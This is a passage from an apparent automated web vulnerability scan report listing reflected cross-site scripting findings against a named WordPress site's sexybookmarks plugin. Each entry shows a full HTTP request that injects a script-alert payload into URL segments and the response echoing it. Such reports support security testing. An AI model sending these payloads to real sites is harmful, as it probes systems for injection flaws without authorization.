User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:17:45 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
WWW-Authenticate: Basic realm="Restricted Area"
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:17:45 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44573

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/plugins/sexybookmarks270ef\"><script>alert(1)</script>6359b9f266f/js/shareaholic-perf.js" type="hidden" />
...[SNIP]...

1.161. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-perf.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/js/shareaholic-perf.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d48cf"><script>alert(1)</script>a0e85372bab was submitted in the REST URL parameter 4. This input was echoed as d48cf\"><script>alert(1)</script>a0e85372bab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/sexybookmarks/jsd48cf"><script>alert(1)</script>a0e85372bab/shareaholic-perf.js HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:18:16 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
WWW-Authenticate: Basic realm="Restricted Area"
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:18:17 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44573

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/plugins/sexybookmarks/jsd48cf\"><script>alert(1)</script>a0e85372bab/shareaholic-perf.js" type="hidden" />
...[SNIP]...

1.162. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-perf.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/js/shareaholic-perf.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6bb79"><script>alert(1)</script>8b65169f2a0 was submitted in the REST URL parameter 5. This input was echoed as 6bb79\"><script>alert(1)</script>8b65169f2a0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/sexybookmarks/js/shareaholic-perf.js6bb79"><script>alert(1)</script>8b65169f2a0 HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:18:48 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
WWW-Authenticate: Basic realm="Restricted Area"
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:18:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44573

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-perf.js6bb79\"><script>alert(1)</script>8b65169f2a0" type="hidden" />
...[SNIP]...

1.163. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-perf.js [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/js/shareaholic-perf.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26cbc"><script>alert(1)</script>8d0b33eac8c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 26cbc\"><script>alert(1)</script>8d0b33eac8c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/sexybookmarks/js/shareaholic-perf.js?26cbc"><script>alert(1)</script>8d0b33eac8c=1 HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:15:46 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
WWW-Authenticate: Basic realm="Restricted Area"
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Mon, 31 Jan 2011 20:15:47 GMT
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44608

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-perf.js?26cbc\"><script>alert(1)</script>8d0b33eac8c=1" type="hidden" />
...[SNIP]...

1.164. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-perf.js/page/2 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/js/shareaholic-perf.js/page/2

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c67a"><script>alert(1)</script>2ac3708dc28 was submitted in the REST URL parameter 1. This input was echoed as 6c67a\"><script>alert(1)</script>2ac3708dc28 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content6c67a"><script>alert(1)</script>2ac3708dc28/plugins/sexybookmarks/js/shareaholic-perf.js/page/2 HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:17:33 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:17:34 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47437

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content6c67a\"><script>alert(1)</script>2ac3708dc28/plugins/sexybookmarks/js/shareaholic-perf.js/page/2" type="hidden" />
...[SNIP]...

1.165. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-perf.js/page/2 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/js/shareaholic-perf.js/page/2

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfb7a"><script>alert(1)</script>6b15bddf239 was submitted in the REST URL parameter 2. This input was echoed as bfb7a\"><script>alert(1)</script>6b15bddf239 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/pluginsbfb7a"><script>alert(1)</script>6b15bddf239/sexybookmarks/js/shareaholic-perf.js/page/2 HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:18:06 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:18:06 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47437

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/pluginsbfb7a\"><script>alert(1)</script>6b15bddf239/sexybookmarks/js/shareaholic-perf.js/page/2" type="hidden" />
...[SNIP]...

1.166. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-perf.js/page/2 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/js/shareaholic-perf.js/page/2

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af530"><script>alert(1)</script>21dd516c846 was submitted in the REST URL parameter 3. This input was echoed as af530\"><script>alert(1)</script>21dd516c846 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/sexybookmarksaf530"><script>alert(1)</script>21dd516c846/js/shareaholic-perf.js/page/2 HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:18:38 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
WWW-Authenticate: Basic realm="Restricted Area"
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:18:38 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47437

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/plugins/sexybookmarksaf530\"><script>alert(1)</script>21dd516c846/js/shareaholic-perf.js/page/2" type="hidden" />
...[SNIP]...

1.167. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-perf.js/page/2 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/js/shareaholic-perf.js/page/2

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d0ea"><script>alert(1)</script>b16941717be was submitted in the REST URL parameter 4. This input was echoed as 7d0ea\"><script>alert(1)</script>b16941717be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/sexybookmarks/js7d0ea"><script>alert(1)</script>b16941717be/shareaholic-perf.js/page/2 HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:19:10 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
WWW-Authenticate: Basic realm="Restricted Area"
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:19:11 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47437

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js7d0ea\"><script>alert(1)</script>b16941717be/shareaholic-perf.js/page/2" type="hidden" />
...[SNIP]...

1.168. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-perf.js/page/2 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/js/shareaholic-perf.js/page/2

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef57b"><script>alert(1)</script>0e42677720 was submitted in the REST URL parameter 5. This input was echoed as ef57b\"><script>alert(1)</script>0e42677720 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/sexybookmarks/js/shareaholic-perf.jsef57b"><script>alert(1)</script>0e42677720/page/2 HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:19:33 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
WWW-Authenticate: Basic realm="Restricted Area"
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:19:34 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47434

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-perf.jsef57b\"><script>alert(1)</script>0e42677720/page/2" type="hidden" />
...[SNIP]...

1.169. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-perf.js/page/2 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/js/shareaholic-perf.js/page/2

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a805"><script>alert(1)</script>cf09bdcc993 was submitted in the REST URL parameter 6. This input was echoed as 8a805\"><script>alert(1)</script>cf09bdcc993 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/sexybookmarks/js/shareaholic-perf.js/page8a805"><script>alert(1)</script>cf09bdcc993/2 HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:19:57 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
WWW-Authenticate: Basic realm="Restricted Area"
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:19:57 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44587

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-perf.js/page8a805\"><script>alert(1)</script>cf09bdcc993/2" type="hidden" />
...[SNIP]...

1.170. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-perf.js/page/2 [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/js/shareaholic-perf.js/page/2

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd333"><script>alert(1)</script>297b5913584 was submitted in the REST URL parameter 7. This input was echoed as fd333\"><script>alert(1)</script>297b5913584 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/sexybookmarks/js/shareaholic-perf.js/page/2fd333"><script>alert(1)</script>297b5913584 HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:20:11 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
WWW-Authenticate: Basic realm="Restricted Area"
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:20:11 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44587

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-perf.js/page/2fd333\"><script>alert(1)</script>297b5913584" type="hidden" />
...[SNIP]...

1.171. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-perf.js/page/2 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/js/shareaholic-perf.js/page/2

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 553f5"><script>alert(1)</script>44b4574d50b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 553f5\"><script>alert(1)</script>44b4574d50b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/sexybookmarks/js/shareaholic-perf.js/page/2?553f5"><script>alert(1)</script>44b4574d50b=1 HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:16:39 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
WWW-Authenticate: Basic realm="Restricted Area"
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Mon, 31 Jan 2011 20:16:39 GMT
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47475

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-perf.js/page/2?553f5\"><script>alert(1)</script>44b4574d50b=1" type="hidden" />
...[SNIP]...

1.172. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1840b"><script>alert(1)</script>8fd264d131a was submitted in the REST URL parameter 1. This input was echoed as 1840b\"><script>alert(1)</script>8fd264d131a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content1840b"><script>alert(1)</script>8fd264d131a/plugins/sexybookmarks/js/shareaholic-publishers.min.js HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:16:50 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:16:50 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44593

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content1840b\"><script>alert(1)</script>8fd264d131a/plugins/sexybookmarks/js/shareaholic-publishers.min.js" type="hidden" />
...[SNIP]...

1.173. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js

Issue detail

